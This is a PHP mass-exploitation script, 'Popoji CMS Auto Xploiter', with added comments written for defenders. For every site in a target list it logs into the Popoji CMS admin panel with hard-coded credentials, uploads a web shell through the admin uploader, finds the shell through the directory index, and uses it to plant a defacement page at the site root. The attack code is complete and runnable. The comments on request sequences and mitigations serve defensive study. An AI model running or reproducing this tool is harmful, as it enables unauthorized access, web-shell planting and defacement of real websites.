| 1 | <?php | |
// Lift PHP's execution time limit and turn off all error reporting for the whole run,
// so a long target list is processed without timeouts or visible warnings.
| 2 | set_time_limit(0); | |
| 3 | error_reporting(0); | |
| 4 | ||
/**
 * Submit the admin login form of a site and return the raw response.
 *
 * Posts mod=login and act=proclogin together with the supplied username and
 * password to $url . "/po-admin/login.php", follows redirects, and keeps the
 * session cookies in a relative 'cookie.txt' file in the working directory.
 * TLS peer and host verification are both disabled, so certificate problems
 * on the remote side are ignored.
 *
 * Defender note: in access logs this is a POST to /po-admin/login.php. The
 * function itself does not decide whether the login worked; it only returns
 * the body for the caller to inspect.
 *
 * @param string $url  Base URL of the site, without a trailing path.
 * @param string $user Username to submit.
 * @param string $pass Password to submit.
 * @return string|bool Whatever curl_exec() returns: the body, or false on failure.
 */
| 5 | function login($url,$user,$pass) {
| |
| 6 | $post_login = array( | |
| 7 | "mod" => "login", | |
| 8 | "act" => "proclogin", | |
| 9 | "username" => $user, | |
| 10 | "password" => $pass, | |
| 11 | ); | |
| 12 | $ch = curl_init(); | |
| 13 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
| 14 | curl_setopt($ch, CURLOPT_URL, $url."/po-admin/login.php"); | |
| 15 | curl_setopt($ch, CURLOPT_POST, true); | |
| 16 | curl_setopt($ch, CURLOPT_POSTFIELDS, $post_login); | |
| 17 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); | |
// Certificate and hostname checks are switched off for this request.
| 18 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
| 19 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); | |
// The same relative cookie file is read and written, so the session carries over to later requests.
| 20 | curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); | |
| 21 | curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); | |
| 22 | curl_setopt($ch, CURLOPT_COOKIESESSION, true); | |
| 23 | return curl_exec($ch); | |
// Never reached: the function has already returned on the line above.
| 24 | curl_close($ch); | |
| 25 | } | |
/**
 * Request $url with cURL and return the response, sending a POST when $post is given.
 *
 * Follows redirects, disables TLS peer and host verification, and shares the
 * relative 'cookie.txt' jar with the other helpers in this file, so any session
 * cookie stored earlier is sent along.
 *
 * @param string $url  Full URL to request.
 * @param mixed  $post POST fields; a value that loosely equals null results in a plain GET.
 * @return string|bool Whatever curl_exec() returns: the body, or false on failure.
 */
| 26 | function ch($url,$post) {
| |
| 27 | $ch = curl_init($url); | |
// Loose comparison: null, an empty array and an empty string all skip the POST setup.
| 28 | if($post !=null) {
| |
| 29 | curl_setopt($ch, CURLOPT_POST, true); | |
| 30 | curl_setopt($ch, CURLOPT_POSTFIELDS, $post); | |
| 31 | } | |
| 32 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
| 33 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); | |
// Certificate and hostname checks are switched off for this request.
| 34 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
| 35 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); | |
| 36 | curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); | |
| 37 | curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); | |
| 38 | return curl_exec($ch); | |
// Never reached: the function has already returned on the line above.
| 39 | curl_close($ch); | |
| 40 | } | |
/**
 * Fetch $url with a plain GET and return the response.
 *
 * Same transport settings as the other helpers in this file: redirects are
 * followed, TLS peer and host verification are disabled, and the relative
 * 'cookie.txt' jar is read and written.
 *
 * @param string $url Full URL to request.
 * @return string|bool Whatever curl_exec() returns: the body, or false on failure.
 */
| 41 | function cek($url) {
| |
| 42 | $ch = curl_init($url); | |
| 43 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
| 44 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); | |
// Certificate and hostname checks are switched off for this request.
| 45 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
| 46 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); | |
| 47 | curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); | |
| 48 | curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); | |
| 49 | return curl_exec ($ch); | |
// Never reached: the function has already returned on the line above.
| 50 | curl_close($ch); | |
| 51 | } | |
/**
 * Print the tool banner, the author credit and the usage/example lines to stdout.
 *
 * The runtime strings are Indonesian ("cara pake" = "how to use", "contoh" =
 * "example"). The usage line names four command-line arguments: a target list,
 * two file names and an HTML file. Takes no parameters and returns nothing.
 */
| 52 | function cover() {
| |
| 53 | echo "<--------------------><-------------------->\n"; | |
| 54 | echo "[ Popoji CMS Auto Xploiter ]\n"; | |
| 55 | echo "// Coded by Mr. Error 404 ft. tu5b0l3d - IndoXploit //\n"; | |
| 56 | echo "cara pake: php popoji.php [list_target.txt] [shell_kalian.jpg] [shell_kalian.php] [file_deface.html]\n"; | |
| 57 | echo "contoh: php popoji.php target.txt indoxloit.jpg indoxploit.php deface.html\n"; | |
| 58 | echo "<--------------------><-------------------->\n\n\n"; | |
| 59 | } | |
// ---------------------------------------------------------------------------
// Main script. For every line of the target list it logs in, sends a file to
// the admin uploader, looks the stored file up in the upload directory's index
// page, and then asks that file to place a second file at the site root.
//
// What a defender can take from this block:
//   * Request sequence per site, as it would appear in access logs:
//     POST /po-admin/login.php, POST /po-admin/js/plugins/uploader/upload.php
//     (fields "file" and "name"), GET /po-content/po-upload/, a POST to a file
//     in that directory with "?do=upload" (fields "tipe_upload", "ix_file",
//     "upload"), then a GET of the newly placed page under the site root.
//   * Stored files are matched by the script as "<name>-<anything>-polibrary.<ext>"
//     inside /po-content/po-upload/; the usage text suggests a .php extension.
//   * The chain stops for a site when the login response lacks the expected
//     words, or when the upload directory does not return an "Index of" listing
//     or its response contains "403". Disabling directory indexes, refusing
//     script execution under the upload directory, validating uploads on the
//     server and removing or rotating the account used here each break it.
//   * The page does not show how the hard-coded account comes to exist on a
//     site -- presumably registered beforehand or a known default; confirm.
// ---------------------------------------------------------------------------
| 60 | $username_popoji = "indoxploit"; // replace with your own username. | |
| 61 | $password_popoji = "indoxploit"; // replace with your own password. | |
// Target list: one entry per line of the file named by the first argument.
| 62 | $sites = explode("\n", file_get_contents($argv[1]));
| |
| 63 | $shell = $argv[2]; | |
| 64 | $nama_shell = $argv[3]; | |
| 65 | $deface = $argv[4]; | |
// Split the requested file name on "." into a base name and an extension; both feed the lookup regex below.
| 66 | $pecah = explode(".", $nama_shell);
| |
| 67 | $nama = $pecah[0]; | |
| 68 | $ext = $pecah[1]; | |
// Runs only when all four inputs are set; otherwise the usage text at the bottom is printed.
| 69 | if(isset($sites) AND isset($shell) AND isset($nama_shell) AND isset($deface)) {
| |
| 70 | cover(); | |
| 71 | foreach($sites as $url) {
| |
| 72 | echo "[+] Nyecan: $url\n"; | |
| 73 | $login = login($url, $username_popoji, $password_popoji); | |
// Login is judged by a case-insensitive word match on the returned body, not by status code.
| 74 | if(preg_match("/beranda|keluar|selamat datang|member|admin/i", $login)) {
| |
| 75 | echo "[+] Login OK\n"; | |
| 76 | $post_upload = array( | |
| 77 | "file" => "@$shell", | |
| 78 | "name" => $nama_shell, | |
| 79 | ); | |
// The client-supplied "name" field carries the file name sent to the uploader endpoint.
| 80 | ch($url."/po-admin/js/plugins/uploader/upload.php", $post_upload); | |
| 81 | $cek_folder = cek("$url/po-content/po-upload/");
| |
// Continues only if the directory index is served and the body does not contain "403".
| 82 | if(preg_match("/Index of \/po-content\/po-upload/", $cek_folder) AND !preg_match("/403/", $cek_folder)) {
| |
// Reads the stored file name out of the index listing.
| 83 | preg_match("/<li><a href=\"$nama-(.*?)-polibrary.$ext\">/", $cek_folder, $shellmu);
| |
| 84 | $shellmu[1] = "$nama-".$shellmu[1]."-polibrary.$ext"; | |
| 85 | $link_shell = $url."/po-content/po-upload/".$shellmu[1]; | |
| 86 | echo "[+] Shellmu: $link_shell\n"; | |
| 87 | $post_deface = array( | |
| 88 | "tipe_upload" => "home_root", | |
| 89 | "ix_file" => "@$deface", | |
| 90 | "upload" => "upload", | |
| 91 | ); | |
| 92 | $depes = ch($link_shell."?do=upload", $post_deface); | |
// Success is reported only if the response contains "uploaded!" and the fetched page contains "hacked".
| 93 | if(preg_match("/uploaded!/i", $depes) AND preg_match("/hacked/i", cek("$url/$deface"))) {
| |
| 94 | echo "[+] Sukses Depes! -> $url/$deface\n\n"; | |
| 95 | } else {
| |
| 96 | echo "[-] Gagal Depes!!\n\n"; | |
| 97 | } | |
| 98 | } else {
| |
// Message (Indonesian): the uploaded file's location is forbidden or the file was removed.
| 99 | echo "[+] Lokasi Shellnya forbidden / kena tebas gann :(\n\n"; | |
| 100 | } | |
| 101 | } else {
| |
// Message (Indonesian): login failed.
| 102 | echo "[+] Login Gagal\n\n"; | |
| 103 | } | |
| 104 | } | |
| 105 | } else {
| |
// Usage text (Indonesian: "cara pake" = "how to use", "contoh" = "example").
| 106 | echo "cara pake: php ".$argv[0]." [shell_kalian.jpg] [shell_kalian.php] [file_deface.html]\n"; | |
| 107 | echo "contoh: php ".$argv[0]." shell.jpg indoxploit.php deface.html\n"; | |
| 108 | } | |
| 109 | ?> |